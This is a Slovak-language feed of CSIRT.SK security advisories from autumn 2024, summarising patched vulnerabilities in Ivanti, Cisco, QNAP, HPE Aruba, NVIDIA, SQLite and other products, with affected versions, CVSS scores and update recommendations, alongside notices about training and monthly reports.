Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 43 bezpečnostných zraniteľností v produktoch Ivanti Endpoint Manager (EPM), Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a Ivanti Secure Access Client (ISAC), z čoho 9 je označených ako kritických. Kritické zraniteľnosti možno zneužiť na vzdialené vykonanie kódu. Ostatné zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a vykonanie neoprávnených zmien v systéme.

Zraniteľné systémy:

Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z novembra 2024
Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z novembra 2024
Ivanti Connect Secure vo verziách starších ako 22.7R2.3
Ivanti Policy Secure vo verziách starších ako 22.7R1.2
Ivanti Secure Access Client vo verziách starších ako 22.7R4

Opis zraniteľnosti:

Ivanti Endpoint Manager:

CVE-2024-50330 (CVSS skóre 9,8)

Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený neautentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na vzdialené vykonanie kódu.

Ivanti Connect Secure, Ivanti Policy Secure:

CVE-2024-38655, CVE-2024-38656, CVE-2024-39710, CVE-2024-39711, CVE-2024-39712 (CVSS skóre 9,1)

Kritické zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol prostredníctvom injekcie argumentov zneužiť na vzdialené vykonanie kódu. Zraniteľnosti možno zneužiť zaslaním špeciálne vytvorených požiadaviek.

CVE-2024-11007, CVE-2024-11006, CVE-2024-11005 (CVSS skóre 9,1)

Kritické zraniteľnosti umožňujúce injekciu príkazov možno zneužiť na vzdialené vykonanie kódu. Zraniteľnosti možno zneužiť zaslaním špeciálne vytvorených požiadaviek a ich zneužitie vyžaduje administrátorské oprávnenia.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby

Odporúčania:

Zdroje:

Zraniteľnosť vo Veeam Backup Enterprise Manager možno zneužiť na obídenie mechanizmov autentifikácie

Marian Danko — Tue, 12 Nov 2024 16:00:59 +0000

Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte Veeam Backup Enterprise Manager (VBEM). Zraniteľnosť CVE-2024-40715 možno zneužiť na obídenie mechanizmov autentifikácie.

Zraniteľné systémy:

Veeam Backup Enterprise Manager vo verzii 12.2.0.334 s hotfixom pre opravu CVE-2024-40715

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách Veeam Backup & Replication, na ktorých je aktivovaný doplnok Veeam Backup Enterprise Manager. Dostupnosť VBEM možno overiť spustením PowerShell-ového príkazu na Veeam Backup Server:
„Get-VBRServer | Out-Null [Veeam.Backup.Core.SBackupOptions]::GetEnterpriseServerInfo() | Format-List”

Opis zraniteľnosti:

CVE-2024-40715 (CVSS skóre 7,7)

Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť s označením CVE-2024-40715 by vzdialený neautentifikovaný útočník prostredníctvom man-in-the-middle útoku mohol zneužiť na obídenie mechanizmov autentifikácie.

Možné škody:

Obídenie mechanizmov autentifikácie

Odporúčania:

Bezodkladná inštalácia hotfixu pre opravu CVE-2024-40715. Inštalácia hotfixu je možná len na Veeam Backup Enterprise Manager vo verzii 12.2.0.334. V prípade starších verzií je vopred potrebné vykonať aktualizáciu na verziu 12.2.0.334 použitím Veeam Backup & Replication ISO.

Zdroje:

Mesačná správa CSIRT.SK – október 2024

Marian Danko — Mon, 11 Nov 2024 13:37:33 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 10/2024 PDF (1 536 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Kritické zraniteľnosti v prístupových bodoch od HPE Aruba Networking

Marian Danko — Fri, 08 Nov 2024 15:13:53 +0000

Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v operačných systémoch Instant AOS-8 a AOS-10 používaných v prístupových bodoch Aruba Series, z čoho 2 sú označené ako kritické. Zraniteľnosti CVE-2024-42509 a CVE-2024-47460 možno zneužiť na injekciu príkazov a vzdialené vykonanie škodlivého kódu.

Zraniteľné systémy:

Prístupové body Aruba Series 103, 110, 120, 130, 200, 207, 210, 220, 300, 303, 310, 320, 330, 340, 500, 510, 530, 550, 630 a 650 s operačným systémom Instant AOS-8 a AOS-10:

AOS-10.4.x.x vo verzii staršej ako 10.4.1.5
AOS-10.6.x.x vo všetkých verziách (ukončená podpora)
AOS-10.5.x.x vo všetkých verziách (ukončená podpora)
AOS-10.3.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.12.x.x vo verzii staršej ako 8.12.0.3
Instant AOS-8.10.x.x vo verzii staršej ako 8.10.0.14
Instant AOS-8.11.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.9.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.8.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.7.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.6.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.5.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-8.4.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-6.5.x.x vo všetkých verziách (ukončená podpora)
Instant AOS-6.4.x.x vo všetkých verziách (ukončená podpora)

Opis zraniteľnosti:

CVE-2024-42509 (CVSS skóre 9,8), CVE-2024-47460 (CVSS skóre 9,0)

Kritické zraniteľnosti CVE-2024-42509 a CVE-2024-47460 sa nachádzajú v CLI (Command Line Interface) službe a vzdialený neautentifikovaný útočník by ich mohol zneužiť na injekciu príkazov a vykonanie škodlivého kódu. Zraniteľnosti je možné zneužiť zaslaním špeciálne vytvorených paketov na UDP port 8211, na ktorom počúva protokol PAPI slúžiaci na manažment prístupových bodov.

CVE-2024-47461 (CVSS skóre 7,2), CVE-2024-47462 (CVSS skóre 7,2), CVE-2024-47463 (CVSS skóre 7,2), CVE-2024-47464 (CVSS skóre 6,8)

Vysoko závažné zraniteľnosti by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie škodlivého kódu alebo získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom

Odporúčania:

Spoločnosť Hewlett Packard Enterprise odporúča bezodkladnú aktualizáciu AOS-10 na verzie 10.4.1.5, 10.7.0.0, alebo novšie a Instant AOS-8 na verzie 8.10.0.14, 8.12.0.3 alebo novšie. V prípadoch, kedy nie je možné vykonať aktualizáciu, výrobca odporúča limitovať prístup k manažmentovým rozhraniam prostredníctvom sieťových a bezpečnostných prvkov. V prípade produktov s ukončenou podporou výrobca odporúča prechod na produkty s platnou technickou podporou. Ďalšie odporúčania výrobcu pre mitigáciu zraniteľností môžete nájsť tu.

Zdroje:

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&docLocale=en_US

Zraniteľnosť v SQLite objavil model AI od Google

Marian Danko — Fri, 08 Nov 2024 15:04:26 +0000

Tím Google Project Zero testoval využitie modelu umelej inteligencie Big Sleep pri hľadaní zraniteľností v známych open source produktoch. Model úspešne objavil zraniteľnosť v SQLite, ktorú neodhalili fuzzingové nástroje. Zraniteľnosť súvisí s podtečením medzipamäte zásobníka, čo môže viesť k schopnosti zapisovať na halde mimo povolené hodnoty.

Zraniteľné systémy:

SQLite 3.47.0 2024-10-05 12:02:17 2f7eab381e16760952d1c90a9119d2a217933f0136442d8f6eeb6d95e366ca4f (64-bit)

Opis činnosti:

Model umelej inteligencie Big Sleep, ktorý prevádzkuje tím Google Project Zero v spolupráci s Google DeepMind, objavil svoju prvú zraniteľnosť v platforme SQLite. Chybu doposiaľ neodhalili automatizované fuzzingové nástroje, nasadené v rámci projektu. Tím testoval správanie a využitie modelu Big Sleep pri hľadaní zraniteľností v open source produktoch.

Objavená zraniteľnosť súvisí s podtečením vyrovnávacej pamäte zásobníka, čo ďalej dovoľuje útočníkom zapisovať do haldy mimo povolené hodnoty. Problematické je miesto zápisu, pretože sa na ňom nachádza ukazovateľ pConstraint, ktorý sa dereferencuje v ďalšom kroku behu programu.

Chyba spočíva v funkcii seriesBestIndex, ktorá nesprávne narába s parametrami rowid. Funkcia očakáva vo vstupe pre parameter iColumn kladné hodnoty (1, 2 alebo 3), no môže do neho vstupovať tiež záporná (-1). V závislosti od konfigurácie to môže spôsobiť zlyhanie pri vyhodnotení riadku „assert( iCol>=0 && iCol<=2 );“ alebo viesť k zápisu do pamäte mimo povolené hodnoty.

Možné škody:

Zápis do pamäte potenciálne zneužiteľný na útok

Odporúčania:

Bezodkladná aktualizácia na najnovšiu verziu.

Odkazy:

Kritická zraniteľnosť v produkte Cisco Unified Industrial Wireless Software

Marian Danko — Fri, 08 Nov 2024 15:00:22 +0000

Spoločnosť Cisco vydala bezpečnostné aktualizácie svojho produktu Cisco Unified Industrial Wireless Software, ktoré opravujú kritickú zraniteľnosť. Produkt je využívaný v rámci URWB (Ultra Reliable Wireless Backhaul) prístupových bodov určených pre priemyselné siete. CVE-2024-20418 možno zneužiť na vzdialené vykonanie príkazov.

Zraniteľné systémy:

prístupové body Cisco Catalyst IW9165D, Catalyst IW9165E a Catalyst IW9167E s Cisco Unified Industrial Wireless Software vo verziách starších ako 17.15.1

Pozn.: Zraniteľnosť je možné zneužiť len na prístupových bodoch, ktoré sú prevádzkované v režime UWBR. Či je Vaše zariadenie prevádzkované v tomto režime môžete overiť zadaním konzolového príkazu „show mpls-config“, ktorý je dostupný len na zariadeniach v tomto režime.

Opis zraniteľnosti:

CVE-2024-20418 (CVSS skóre 10,0)

Kritická zraniteľnosť Cisco Unified Industrial Wireless Software spočíva v nedostatočnom overovaní používateľských vstupov v rámci webového manažmentového rozhrania a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej HTTP požiadavky mohol zneužiť na vzdialené vykonanie príkazov na operačnom systéme zariadenia, s oprávneniami používateľa root.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Bezodkladná aktualizácia Cisco Unified Industrial Wireless Software na verziu 17.15.1 a vyššie.

Zdroje:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

Kritická zraniteľnosť QNAP QuRouter

Marian Danko — Fri, 08 Nov 2024 14:57:18 +0000

Spoločnosť QNAP vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť vo svojom operačnom systéme QuRouter. Bližšie nešpecifikovanú zraniteľnosť s označením CVE-2024-50389 možno zneužiť na získanie úplnej kontroly nad zariadením. Informácie o druhu zraniteľnosti neboli zverejnené.

Zraniteľné systémy:

QuRouter 2.4.x

Opis činnosti:

CVE-2024-50389

Aplikácia QuRouter spoločnosti QNAP obsahuje kritickú zero-day zraniteľnosť, ktorú odhalil tím Viettel Cyber Security počas súťaže Pwn2Own Ireland. Chyba umožňuje získať útočníkom prístup ku zraniteľným zariadeniam. Žiadne bližšie informácie o zraniteľnosti zatiaľ neboli zverejnené.

Možné škody:

Neautorizovaný prístup k zariadeniu

Odporúčania:

Bezodkladná aktualizácia QuRouter na verziu 2.4.5.032 alebo novšiu. Postup nájdete tu.

Odkazy:

Zraniteľnosť pluginu WordPress LiteSpeed Cache umožňuje získanie administrátorského prístupu

Marian Danko — Fri, 08 Nov 2024 14:54:00 +0000

Vývojári populárneho pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú bezpečnostnú zraniteľnosť. CVE-2024-50550 možno zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

WordPress plugin LiteSpeed Cache vo verziách starších ako 6.5.2

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách LiteSpeed Cache s nasledujúcou konfiguráciou komponentu crawler:
Crawler->General Settings->Crawler: ON
Crawler->General Settings->Run Duration: 2500 – 4000
Crawler->General Settings->Interval Between Runs: 2500 – 4000
Crawler->General Settings->Server Load Limit: 0
Crawler->Simulation Settings->Role Simulation: 1 (ID používateľa s rolou Administrator)
Crawler->Summary->Activate: Turn every row to OFF except Administrator

Opis zraniteľnosti:

CVE-2024-50550 (CVSS skóre 8,1)

Vysoko závažná zraniteľnosť s označením CVE-2024-50550 spočíva v nedostatočnom overovaní hashov v rámci funkcionality pre simuláciu používateľov (role simulation), ktorá je súčasťou komponentu crawler. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií a získanie administrátorského prístupu. Administrátorský prístup možno zneužiť na nahranie škodlivých pluginov a zmenu konfigurácie redakčného systému.

Možné škody:

Eskalácia privilégií
Získanie úplnej kontroly nad systémom

Odporúčania:

Bezodkladná aktualizácia LiteSpeed Cache na verziu 6.5.2 a vyššie.

Zdroje:

Mesačný prehľad kritických zraniteľností október 2024

Marian Danko — Thu, 07 Nov 2024 13:42:23 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci október 2024.

Mesačný prehľad – 10/2024 PDF (714 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Protect AI: Októbrové zraniteľnosti v modeloch AI

Marian Danko — Thu, 31 Oct 2024 12:53:22 +0000

Protect AI’s huntr je prvý program odmeňovania za nájdenie zraniteľností v oblasti AI/ML na svete. Októbrová správa tejto iniciatívy informuje o 34 objavených zraniteľnostiach, z toho sú 3 kritické. Najzávažnejšie chyby umožňujú vzdialené vykonávanie kódu, prístup ku chráneným zdrojom a únik citlivých informácií.

Zraniteľné systémy:

Lunary verzia 1.3.2
gaizhenbiao/chuanhuchatgpt verzia 20240628
Mudler/localai verzia 2.17.1

Opis činnosti:

CVE-2024-7474 (CVSS skóre 9,1) a CVE-2024-7475 (CVSS skóre 9,1)

Kritické zraniteľnosti sa nachádzajú v komponente Lunary a vznikajú z dôvodu nedostatočnej kontroly prístupu. Zraniteľnosť CVE-2024-7474 typu IDOR vzniká kvôli nedostatočnej kontrole prístupu na parameter používateľského ID v koncových bodoch API pre správu externých používateľov. Úspešné zneužitie (manipulácia s parametrom ID) umožňuje autentifikovanému útočníkovi získať kontrolu nad správou externých používateľov. Chyba CVE-2024-7475 umožňuje neautorizovanému útočníkovi aktualizovať konfiguráciu SAML (Security Assertion Markup Language), čo môže viesť k manipulácii s autentifikačnými procesmi, podvodným prihlasovacím požiadavkám a krádeži používateľských informácií. Útočník môže zraniteľnosť zneužiť odoslaním špeciálne vytvorenej požiadavky POST.

CVE-2024-5982 (CVSS skóre 9,1)

Kritická zraniteľnosť typu path traversal sa nachádza v komponente gaizhenbiao/chuanhuchatgpt. Chyba spočíva v nevhodnej sanitizácii používateľských vstupov, ktoré sú pripájané ku cestám k adresárom pomocou funkcie os.path.join. Tieto vstupy využíva viacero ďalších funkcií. Funkcia load_chat_history v súbore modules/models/base_model.py umožňuje nahrávanie ľubovoľných súborov, čo môže viesť k vzdialenému vykonávaniu kódu. V súbore utils.py umožňuje funkcia get_history_names vytváranie ľubovoľných adresárov a funkcia pre nahrávanie šablón load_template dovoľuje získať hodnoty z prvého stĺpca CSV súborov.

CVE-2024-6983 (CVSS skóre 8,8)

Vysoko závažná zraniteľnosť komponentu Mudler/localai umožňuje útočníkovi nahrať binárny súbor a spustiť škodlivý kód. Zraniteľnosť dovoľuje útočníkovi nahrať vlastný konfiguračný súbor, ktorý obsahuje odkaz na externý súbor. Tento si zraniteľná aplikácia stiahne a vykoná.

Možné škody:

Vzdialené vykonávanie kódu
Prístup ku chráneným zdrojom
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie

Lunary 1.3.4
gaizhenbiao/chuanhuchatgpt 20240918
Mudler/localai 2.19.4

Odkazy:

Kritická zraniteľnosť Spring WebFlux

Marian Danko — Wed, 30 Oct 2024 15:35:51 +0000

Spoločnosť Broadcom vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť vo webovom frameworku Spring WebFlux. Bližšie nešpecifikovanú zraniteľnosť s označením CVE-2024-38821 by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie bezpečnostných mechanizmov a narušenie dôvernosti a integrity systému.

Zraniteľné systémy:

Spring WebFlux 5.7.0 – 5.7.12, 5.8.0 – 5.8.14
Spring WebFlux 6.0.0 – 6.0.12, 6.1.0. – 6.1.10, 6.2.0 – 6.2.6, 6.3.0 – 6.3.3
Spring WebFlux staršie verzie (nepodporované)

Opis činnosti:

CVE-2024-38821 (CVSSv3.1 skóre 9,1)

Vývojári Spring Framework opravili kritickú zraniteľnosť v module Spring WebFlux, ktorá súvisí s možnosťou za istých nešpecifikovaných podmienok obchádzať pravidlá autorizácie „Spring Security“ pre statické zdroje v aplikáciách WebFlux. Pre jej úspešné zneužitie musí aplikácia využívať podporu statických zdrojov Spring a mať pre ňu nastavené autorizačné pravidlo „non-permitAll“.

Možné škody:

Neautorizovaný prístup ku zdrojom

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie

Spring WebFlux 5.7.13, 5.8.15
Spring WebFlux 6.0.13, 6.1.11, 6.2.7, 6.3.4

Odkazy:

Kritická zraniteľnosť v produktoch QNAP HBS 3 Hybrid Backup Sync a SMB Service

Marian Danko — Wed, 30 Oct 2024 10:30:34 +0000

Spoločnosť QNAP vydala bezpečnostné aktualizácie svojho nástroja pre zálohovanie a obnovu dát HBS 3 (HYBRID BACKUP SYNC), ktoré opravujú kritickú zero-day zraniteľnosť. CVE-2024-50388 možno zneužiť na vzdialené vykonanie kódu. HBS 3 je používaný v rámci sieťových úložísk QNAP NAS s operačnými systémami QTS a QuTS hero. Aktualizácie opravujú tiež kritickú zero-day zraniteľnosť SMB Service, ktorá umožňuje útoky typu SQL injection a získanie kontroly nad zariadením.
[Aktualizované 31.10.2024]

Zraniteľné systémy:

HBS 3 Hybrid Backup Sync vo verziách starších ako 25.1.1.673
SMB Service 4.15.x, SMB Service h4.15.x

Opis zraniteľnosti:

CVE-2024-50388 (CVSS skóre 9,8)

Bližšie nešpecifikovanú kritickú zero-day zraniteľnosť HBS3 (HYBRID BACKUP SYNC) s označením CVE-2024-50388 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov a vykonanie kódu.

CVE-2024-50387

Kritická zero-day zraniteľnosť v komponente SMB Service, ktorý využívajú sieťové úložiská NAS, spočíva v nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu SQL injekcie a získanie úplnej kontroly nad zariadením (prístupu k root shell).

Zraniteľnosti objavili účastníci hackerskej súťaže PWN2OWN IRELAND 2024.

Možné škody:

Vzdialené vykonávanie kódu
Prevzatie kontroly nad zariadením

Odporúčania:

Pre CVE-2024-50388 odporúča spoločnosť QNAP vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verziu 25.1.1.673 a vyššie. Presný postup môžete nájsť na stránke výrobcu, v časti „Updating HBS 3 Hybrid Backu Sync“.

Pre CVE-2024-50387 odporúča výrobca aktualizovať SMB Service aspoň na verziu 4.15.002 / h4.15.002.

Zdroje:

Pozývame Vás do nášho Výcvikového a školiaceho strediska

Marian Danko — Tue, 29 Oct 2024 15:09:22 +0000

Ste organizácia štátnej alebo verejnej správy? Príďte na školenie v našom Výcvikovom a školiacom stredisku. Môžete sa zúčastniť vzdelávacej aktivity, ktorá je navrhnutá tak, aby rozvinula vaše schopnosti v oblasti kybernetickej bezpečnosti a otestovala vás v oblasti detekcie hrozieb, reakcie na incidenty, obrany infraštruktúry, či zabezpečenia kontinuity prevádzky.

V našom školiacom stredisku vieme ponúknuť rôzne druhy školení, pripravené na mieru pre Vašu organizáciu.

Kyberaréna

Kybernetické hrozby sa neustále vyvíjajú v ich soﬁstikovanosti a rozsahu. Prístup ku kybernetickej bezpečnosti organizácie je dôležitejší, ako nikdy predtým.

Školenie v kyberaréne ponúka dynamické prostredie, kde sa môžete zapojiť do viac ako 70 scenárov, ktorých riešením získate cenné poznatky o bezpečnostných nástrojoch a bezpečnostnej politike. V rámci tímu budete spolupracovať s kolegami na riešení komplexných výziev pri chránení infraštruktúry simulovanej organizácie a návrhoch bezpečnostných opatrení. Hlavným cieľom je rozvoj hard-skills, tímová kooperácia, reakcia na incidenty, procesy pri riešení incidentov a práca s bezpečnostnými nástrojmi.

Blue team, Red team
5 rôznych prostredí infraštruktúry (landscapes)
70 scenárov z ktorých si môžu účastníci vyberať. (DDoS útok, brute force, SQL injection, zneužitie rôznych zraniteľností, malware/ransomware útoky a ďalšie…)
Nástroje – Zabbix/Elastic, F5, Palo Alto, EDR, Vulnerability skener a ďalšie…

Tabletop cvičenia

Máte v organizácii nastavené procesy, ale ešte ste ich nemuseli aplikovať? Boli by ste pripravení, keby ste museli riešiť nárazovo mnoho krízových situácií? Tabletop sú cvičenia, na ktorých sa členovia tímu stretávajú v neformálnom, riadenom prostredí, aby riešili úlohy počas mimoriadnych udalostí a otestovať svoje reakcie na krízové situácie. Súčasťou cvičenia je mix 7 scenárov, ktoré si môžu používatelia zahrať.

Ako by ste reagovali pri cielenej a úspešnej phishingovej kampani, či zneužití mena vašej organizácie na dezinformačnú kampaň? Viete pracovať v tíme, rozdeliť si roly a dohodnúť sa za krátky čas na reakcii?
Cieľom školení je precvičiť si tímovú spoluprácu, kritické myslenie a schopnosť reagovať aj na bizarné situácie.

Phishing
Dezinformácie
Riadenie kontinuity prevádzky
Sociálne inžinierstvo

Prečo sa zúčastniť školenia Kyberaréna?

Interaktivita: Zabráňte útokom v simulovanom prostredí skôr, ako bude neskoro, zdokonaľte svoje schopnosti riešiť krízové situácie a získané poznatky využite pri zabezpečení infraštruktúry vlastnej organizácie.
Prax: Konzultujte svoje kroky s ľuďmi, ktorí riešia kybernetické incidenty denne.
Bezpečnostné nástroje: Vyskúšajte si a preskúmajte bezpečnostné nástroje predtým, ako ich nasadíte u seba.

Pre koho je školenie určené?

Toto školenie je ideálne pre bezpečnostných profesionálov, IT manažérov, manažérov vo verejnej správe, analytikov SOC, správcov sietí a pre každého, kto sa zaujíma o ochranu digitálnych aktív.

Rezervujte si svoje miesto už dnes!

Vzhľadom na praktickú povahu školenia sú miesta obmedzené. Zabezpečte si svoje miesto registráciou tu: https://kyberarena.csirt.sk/registracia

Tešíme sa na vašu účasť na tomto jedinečnom a podnetnom vzdelávacom zážitku. Spoločne budujme bezpečnejšiu digitálnu budúcnosť.

V prípade otázok alebo ďalších informácií nás prosím kontaktujte na vzdelavanie@csirt.sk

Našu pozvánku si môžete stiahnuť ako PDF.

NVIDIA opravila závažné zraniteľnosti ovládačov

Marian Danko — Fri, 25 Oct 2024 12:58:11 +0000

Spoločnosť nVidia vydala bezpečnostné aktualizácie, ktoré opravujú viacero vysoko závažných zraniteľností v ovládačoch grafických kariet. Najzávažnejšiu zraniteľnosť s označením CVE‑2024‑0126 by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií a vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.

Zraniteľné systémy:

GeForce, NVIDIA RTX, Quadro, NVS, Tesla – všetky ovládače pre Windows vo verziách starších ako 566.03, 553.24 a 538.95
GeForce, NVIDIA RTX, Quadro, NVS, Tesla – všetky ovládače pre Linux vo verziách starších ako 565.57.01, 550.127.05 a 535.216.01
vGPU – komponent Guest Driver 17.3, 16.7 a staršie, ovládač pre Windows 552.74 a 538.78 a Linux 550.90.07 a 535.183.06
vGPU – komponent Virtual GPU Manager 17.3, 16.7 a staršie, ovládače vo verziách 552.55, 550.90.05 a 535.183.04
Cloud Gaming – komponent Guest Driver September 2024 a staršie verzie, ovládač pre Windows 560.94 a Linux 560.35.03
Cloud Gaming – komponent Virtual GPU Manager September 2024 a staršie verzie, ovládač 560.35.03

Opis činnosti:

CVE-2024-0126 (CVSS skóre 8,2): zraniteľnosť ovládačov NVIDIA GPU pre Windows a Linux umožňuje zvýšenie oprávnení lokálnemu privilegovanému útočníkovi.

CVE-2024-0117, CVE-2024-0118, CVE-2024-0119, CVE-2024-0120, CVE-2024-0121 (CVSS skóre 7,8): zraniteľnosti ovládačov NVIDIA GPU pre Windows v používateľskej vrstve umožňujú štandardnému používateľovi čítať obsah pamäte mimo povolené hodnoty.

CVE-2024-0127 (CVSS skóre 7,8): zraniteľnosť ovládača GPU v NVIDIA vGPU Manager umožňuje používateľovi hosťovského OS spôsobiť nevhodnú validáciu vstupov.

CVE-2024-0128 (CVSS skóre 7,1): zraniteľnosť NVIDIA vGPU Manager umožňuje používateľovi hosťovského OS prístup ku globálnym prostriedkom.

Úspešným zneužitím zraniteľností môžu útočníci získať schopnosť vykonávať kód, zneprístupniť služby, eskalovať svoje privilégiá a získať neoprávnený prístup k citlivým údajom.

Možné škody:

Únik citlivých informácií
Vykonávanie kódu
Zneprístupnenie služby (DoS)
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia ovládačov GeForce, NVIDIA RTX, Quadro, NVS a Tesla:

pre Windows aspoň na verzie 566.03, 553.24 a 538.95
pre Linux aspoň na verzie 565.57.01, 550.127.05 a 535.216.01
vGPU – komponent Guest Driver 17.4, 16.8, ovládač pre Windows 553.24 a 538.95 a Linux 550.127.05 a 535.216.01
vGPU – komponent Virtual GPU Manager 17.4, 16.8, ovládače 553.20, 550.127.06 a 535.216.01
Cloud Gaming – komponent Guest Driver October 2024, ovládač pre Windows 566.03 a Linux 565.57.01
Cloud Gaming – komponent Virtual GPU Manager October 2024, ovládač 565.57.01

Odkazy:

https://nvidia.custhelp.com/app/answers/detail/a_id/5586

Strašidelné štatistiky v roku 2024 [Infografika]

Marian Danko — Fri, 25 Oct 2024 11:26:12 +0000

S blížiacim sa Halloweenom vám prinášame “desivé” fakty z oblasti kybernetickej bezpečnosti. V roku 2024 čelíme nárastu kybernetických hrozieb, ktoré sú strašidelnejšie než kedykoľvek predtým. Ransomvér, phishing a rôzne iné útoky dosahujú rekordné čísla. Pozrite si našu infografiku, ktorá odhalí, aké “príšery” číhajú v online priestore. Nezabudnite, že kybernetická bezpečnosť nie je len o technológiách, ale aj o vašom správaní na internete.

Infografika- Strašidelné štatistiky 2024 (PDF)

Všetky naše infografiky si môžete pozrieť tu.

Kritické zraniteľnosti produktov Cisco

Marian Danko — Thu, 24 Oct 2024 15:29:45 +0000

Spoločnosť Cisco opravila kritické zraniteľnosti vo viacerých svojich produktoch. Zraniteľnosti Cisco Secure Firewall Management Center a Adaptive Security Appliance umožňujú vykonávanie ľubovoľných systémových príkazov s oprávneniami používateľa root. Zraniteľnosť Firepower Threat Defense súvisí s prítomnosťou prihlasovacích údajov v kóde systému a umožňuje tak neoprávnený prístup do systému.

Zraniteľné systémy:

Všetky produkty, na ktorých beží zraniteľná verzia Cisco FMC
Všetky produkty, na ktorých beží zraniteľná verzia Cisco ASA, majú povolené CiscoSSH a povolený prístup cez SSH na niektorom rozhraní
Cisco Firepower série 1000, 2100, 3100 a 4200, ktoré využívajú Cisco FTD verzie 7.1 až 7.4 s databázou zraniteľností (VDB) verzie 387 a staršej

Zraniteľnosť svojho zariadenia si môžete overiť nástrojom spoločnosti Cisco.

Opis činnosti:

CVE-2024-20329 (CVSS skóre 9,9)

Kritická zraniteľnosť Cisco Adaptive Security Appliance vo funkcionalite pre komunikáciu cez SSH, ktorá spočíva v nedostatočnom overovaní používateľských vstupov. Autentifikovaný vzdialený útočník s nízkymi oprávneniami môže odoslaním špeciálne vytvoreného vstupu v SSH konzole vykonávať ľubovoľné príkazy v operačnom systéme s oprávneniami používateľa root.

CVE-2024-20424 (CVSS skóre 9,9)

Kritická zraniteľnosť vo webovom manažmentovom rozhraní Cisco Secure Firewall Management Center, ktorá spočíva v nedostatočnom overovaní vstupov niektorých HTTP požiadaviek. Autentifikovaný vzdialený útočník s rolou aspoň Security Analyst (Read Only) môže vykonávať ľubovoľné príkazy s oprávneniami používateľa root na hostiteľskom systéme alebo príkazy na zariadeniach Firepower Threat Defense.

CVE-2024-20412 (CVSS skóre 9,3)

Kritická zraniteľnosť Cisco Firepower Threat Defense pre Firepower 1000, 2100, 3100 a 4200, ktorá súvisí s prítomnosťou statických účtov s heslami prítomnými v kóde softvéru. Lokálny neautentifikovaný útočník môže získať prístup k týmto prihlasovacím údajom, a tak získať prístup do zraniteľného systému. Následne môže získať prístup k citlivým informáciám, vykonávať konfiguračné zmeny a zamedziť zariadeniu, aby naštartovalo.

Možné škody:

Vykonávanie ľubovoľných príkazov
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia produktov Cisco.

Zraniteľnosť CVE-2024-20329 môžete mitigovať zakázaním CiscoSSH a jeho nahradením natívnou implementáciou SSH.

Spoločnosť Cisco poskytuje mitigáciu aj pre zraniteľnosť CVE-2024-20412, bez špecifikácie podrobností. Taktiež uverejnila návod pre overenie potenciálnej kompromitácie.

Odkazy:

Novú kritickú zraniteľnosť FortiManager aktívne zneužívajú na vykonávanie kódu

Marian Danko — Thu, 24 Oct 2024 15:22:31 +0000

